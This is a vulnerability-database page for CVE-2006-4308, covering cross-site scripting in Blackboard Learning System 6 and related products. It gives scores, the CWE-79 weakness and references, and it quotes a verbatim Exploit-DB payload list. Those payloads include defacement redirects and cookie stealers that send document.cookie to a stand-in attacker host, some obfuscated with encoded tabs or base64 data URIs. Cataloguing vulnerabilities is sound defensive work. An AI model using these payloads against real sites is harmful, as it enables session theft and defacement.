CVE-2006-4308 : Detail

CVE-2006-4308

Cross-site Scripting
A03-Injection
0.79%V3
Network
2006-08-23 17:00 +00:00
2018-10-17 18:57 +00:00

Alert for a CVE

Stay informed of any changes for a specific CVE.
Alert management

Descriptions

Multiple cross-site scripting (XSS) vulnerabilities in Blackboard Learning System 6, Blackboard Learning and Community Portal Suite 6.2.3.23, and Blackboard Vista 4 allow remote attackers to inject arbitrary Javascript, VBScript, or HTML via (1) data, (2) vbscript, and (3) malformed javascript URIs in various HTML tags when posting to the Discussion Board.

Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Metrics

Metric Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 28324

Publication date : 2006-08-23 22:00 +00:00
Author : proton
EDB Verified : Yes

source: https://www.securityfocus.com/bid/19308/info Blackboard products are prone to multiple HTML-injection vulnerabilities because the software fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would execute in the context of the affected website, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible. Blackboard Learning System (Release 6) and Blackboard Learning and Community Portal Suite (Release 6 build 6.2.3.23) are vulnerable; other version may also be affected. Reports indicate this issue has been addressed in versions 7.0 and 7.1, but Symantec has not confirmed this. UPDATE (June 14, 2007): Reports indicate that Blackboard Academic Suite - Vista 4 is also vulnerable. Defacement (FrameBuster) ------------------------- <meta http-equiv="refresh" content="15;url= http://evilsite.com"> Defacement (FrameBuster) ------------------------- <iframe src=" http://evilsite.com" width=100 height=100></iframe> Defacement (IE ONLY) ------------------------- <img src=vbscript:document.write("defaced_by_insane_script_kiddies")> Defacement (IE ONLY) ------------------------- <link rel="stylesheet" href=vbscript:document.write("defaced_by_insane_script_kiddies")> Cookie Stealer (IE ONLY) ------------------------- <img src="vbscript:wintest=window.open(%22http://evilsite.com + document.cookie)"style=visibility:hidden/> <img src="vbscript:window.focus ()"style=visibility:hidden/> <img src="vbscript: window.close()"style=visibility:hidden/> Cookie Stealer (IE ONLY) ------------------------- <link rel="stylesheet" href="vbscript:wintest=window.open(%22http://evilsite.com+document.cookie)"> Cookie Stealer (Encoded Tab - IE ONLY) ------------------------- <img src="jav&#x09;ascript: document.images[1].src=%22http://evilsite.com+document.cookie;"<img src="jav ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/> Cookie Stealer (html encoded - IE ONLY) ------------------------- <img src=&#039;&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;document.images[1].s rc=" http://evilsite.com"+document.cookie;&#039;<img src="jav ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/> Cookie Stealer (tabs - IE ONLY) ------------------------- <img src="jav ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/> Cookie Stealer (body tag with tabs - IE ONLY) ------------------------- <body background="jav ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"> Cookie Stealer (div tag with tabs - IE ONLY) ------------------------- <div style="background-image: url(jav ascript:document.images[1].src=%22http://evilsite.com+document.cookie;)"> Cookie Stealer (firefox) ------------------------- <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4="> Cookie Stealer (firefox - click to work) ------------------------- <a href="data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=">hmmm</a>

Products Mentioned

Configuraton 0

Blackboard>>Blackboard >> Version 6.0

    Blackboard>>Blackboard_learning_and_community_portal_suite >> Version 6.0

      Blackboard>>Blackboard_learning_and_community_portal_suite >> Version 6.2.3.23

        Blackboard>>Vista >> Version 4

          References

          http://www.securityfocus.com/bid/19308
          Tags : vdb-entry, x_refsource_BID
          http://www.vupen.com/english/advisories/2006/3366
          Tags : vdb-entry, x_refsource_VUPEN
          http://secunia.com/advisories/21577
          Tags : third-party-advisory, x_refsource_SECUNIA
          http://securitytracker.com/id?1016735
          Tags : vdb-entry, x_refsource_SECTRACK
          Click on the button to the left (OFF), to authorize the inscription of cookie improving the functionalities of the site. Click on the button to the left (Accept all), to unauthorize the inscription of cookie improving the functionalities of the site.